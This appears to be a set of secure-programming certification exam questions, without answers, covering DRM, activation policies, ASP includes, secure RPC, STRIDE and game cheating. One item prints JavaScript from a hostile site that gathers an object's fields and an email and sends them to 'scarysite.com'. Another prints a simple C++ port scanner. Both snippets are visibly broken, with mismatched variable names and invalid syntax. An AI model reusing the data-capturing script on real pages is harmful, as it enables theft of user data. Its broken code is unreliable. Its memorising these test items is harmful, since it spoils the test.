Wayne is a gaming software developer for a large video gaming company in Los Angeles. Wayne
has just completed developing a new action/adventure game for the company that is to be
released soon. To protect the company’s copyright on the game, Wayne would like to incorporate
a technology that will restrict the use of the digital files by controlling access, altering, sharing,
copying, printing, and saving. What technology does Wayne want to use?

Kenny is the CIO for Fredrickson Entertainment, a gaming software company in Omaha. The
developers in Kenny’s company have just finished creating a 3D first person shooter game that will
be released to the market within the next couple of months. Kenny is trying to decide what type of
license or activation code structure they should use for the game to prevent piracy and protect
their product. Kenny decides to go with an approach that will allow each sold copy to be activated
online up to five times because he knows his users might have multiple PCs or might need to
reinstall the product at some point.

What type of activation policy has Kenny decided to go with?

John is creating a website using ASP. John’s web pages will have a number of calculations, so he
decides to create an include file that the pages will call so he does not have to rewrite the formula
numerous times. John’s website will be hosted by a server running IIS. John wants to ensure that
the include source code is not revealed when the pages are viewed, so he gives the include an
.asp extension.
When IIS processes the include file, which system file will be used to hide the include source
code?

Devon is an applications developer that just got back from a conference on how to correctly write
code. Devon has a number of programs he has written that access data across WAN links, so he
is particularly concerned about their security. Devon writes a script in C++ to check the security of
the programs running on his internal servers. What will the following code from Devon’s script
accomplish?
#include <iostream>
#include <socket.cpp>

#include <util.h>
using namespace std;
bool tryPort(int p);
string target(“”);
int main(int argC, char *argV[])
{
printf(“PlagueZ port scanner 0.1\n”);
int startPort = getInt(“start Port: “);
int endPort = getInt(“end Port: “);
target = getString(“Host: “);
printf(“[Processing port %d to %d]\n”,
startPort, endPort);
for(int i=0; i<endPort; i++)
{
printf(“[Trying port: %d]\n”, i);
if(tryPort(i)) // port open
printf(“[Port %d is open]\n”, i);
}
printf(“——Scan Finished——-\n”);
system(“pause”);
return 0;
}
bool tryPort(int p)
{
SocketClient *scan;
try
{

scan = new SocketClient(target, p);
}
catch(int e) { delete &scan; return
false; }
delete &scan;
return true;
}

Travis, a senior systems developer for YNY Services, received an email recently from an
unknown source. Instead of opening the email on his normal production machine, Travis decides
to copy the email to a thumb drive and examine it from a quarantined PC not on the network.
Travis examines the email and discovers a link that is supposed to take him to
http://scarysite.com. Travis decides to get back on his production computer and examine the code
of that site.
From the following code snippet, what has Travis discovered?
<script>
function object() {
this.email setter = captureobject
}
function captureobject(x) {
var objstring = “”
for(fld in this) {

obstring += fld + “: “ this[fld] + “, “;
}
obstring += “email: “ + x;
var req = new XMLHttpRequest();
req.open(“GET”, “http://scarysite.com?obj=“ +
escape(objString), true);
req.send(null);
}
</script>

David is a developer that has created an application using the secure RPC protocol. Before
anyone can actually use the program, where must David add entries for the users so that they can
gain access?

Jayson is the head developer of a team working on an inventory tracking and maintenance

program. Jayson and his team are in the third phase of the software development life cycle,
designing the program. In their current development phase, what material would be considered the
input for their program?

What is the new lightweight audit framework that is built into Red Hat Linux Enterprise?

Sherry is programming an online game and is trying to prevent security threats from being
introduced into the game. She is also trying to prevent any kind of online cheating by searching for
possible anomalies. Sherry especially wants to prevent cheating where a program or application is
used to replace human reaction to produce superior results. What category of online cheating is
she most concerned about?

What programming threat model with six categories includes repudiation, spoofing identity,
information disclosure and so on?